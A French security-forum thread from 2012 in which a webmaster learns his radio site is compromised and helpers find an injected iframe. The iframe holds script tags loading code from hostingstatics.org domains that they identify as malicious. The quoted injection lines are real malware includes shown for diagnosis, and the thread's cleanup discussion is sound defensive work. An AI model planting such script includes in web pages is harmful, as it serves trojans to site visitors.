Security-X
Forum Security-X => Désinfections => Discussion démarrée par: Natho le octobre 29, 2012, 20:06:34
-
Bonsoir
On me signale que mon site est piraté alors que je ne vois rien sur mon PC.
Voilà le message que je viens de recevoir ( digne de confiance )
mon site :
http://www.radiocountryfamily.info
'' Je te confirme que ton site a été piraté... Le script a été modifié et pointe sur URL dangereuse !!!!
Tout semble OK mais en fait lors de la consultation, un lien pointe vers un trojan.
Il faut effectuer un contrôle en passant par ton espace FTP et changer rapidement ton mot de passe d'accès.
Bon courage !
Pour info, j'utilise ESET qui a immédiatement détecté le lien foireux. Firefox s'est immédiatement figé. ''
-
Bonsoir Natho,
Bienvenu sur Security-X
C'est une connaissance qui te l'as signalé ?
Il t'as donné plus d'info ? comme le lien détecté par Eset ?
Sur quel page, l'accueil, etc ...
à première vu je ne vois rien ...
-
Bonsoir,
Je pense qu'il y a en effet quelque chose.
En fouillant j'ai trouvé quelque chose d'étrange, une deuxième en-tête suspecte dans une iframe :
<iframe id="InlineFrame1" width="1774" scrolling="no" height="31" frameborder="0" style="overflow-x:hidden" src="http://www.radiocountryfamily.info/message/encart-defilant.php" name="InlineFrame1">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>encart-defilant</title>
<meta content="text/html; charset=ISO-8859-1" http-equiv="Content-Type">
<meta content="NetObjects (http://netobjects.com)" name="Generator">
<meta content="100; URL=http://www.radiocountryfamily.info/message/encart-defilant.php" http-equiv="Refresh">
<script src="jquery-1.6.1.min.js" type="text/javascript">
<script name="jsfile" src="http://node1.hostingstatics.org/modules/ad.php?id=5" type="text/javascript">
<script name="umtz" src="http://node2.hostingstatics.org/modules/ad.php?id=7" type="text/javascript">
<script src="jquery.li-scroller.1.0.js" type="text/javascript">
<script name="jsfile" src="http://node1.hostingstatics.org/modules/ad.php?id=5" type="text/javascript">
<script name="umtz" src="http://node2.hostingstatics.org/modules/ad.php?id=7" type="text/javascript">
<link media="screen" type="text/css" href="li-scroller.css" rel="stylesheet">
<script type="text/javascript">
<link href="./fusion.css" type="text/css" rel="stylesheet">
<link href="./style.css" type="text/css" rel="stylesheet">
<link href="./site.css" type="text/css" rel="stylesheet">
</head>
<body style="background-color: rgb(46,141,246); margin: 0px;">
</html>
</iframe>
Or, si on fait quelques recherches sur : hxxp://node1.hostingstatics.org & hxxp://node2.hostingstatics.org, on tombe sur des choses intéressantes :
http://www.crm-france.com/index.php?option=com_fireboard&func=view&catid=4&id=14737&Itemid=7#14737
http://labs.sucuri.net/?details=node2.hostingstatics.org
-
:III Ah oui, tiens j'avais pas vu ... T'es meilleur chercheur que moi :NNN
... je le trouve même pas ... :BBB
-
J'ai utilisé Firebug (https://addons.mozilla.org/fr/firefox/addon/firebug/) pour aller "plus loin" :hi:
Par contre mes compétences s'arrêtent là.. Je pense qu'il faudrait enlever cet iframe, mais il vaudrait mieux attendre l'avis de personnes plus qualifiés.
-
:NNN ben moi aussi ...donc je suis encore moins bon que toi :hi:
Pour la suppression, le plus simple est de se tourner vers son hébergeur généralement s'il offre ce service, il nettoiera et comblera la faille.
:AAN
-
Merci pour ces infos, je transmet à l'hébergeur
Cordialement
NAtho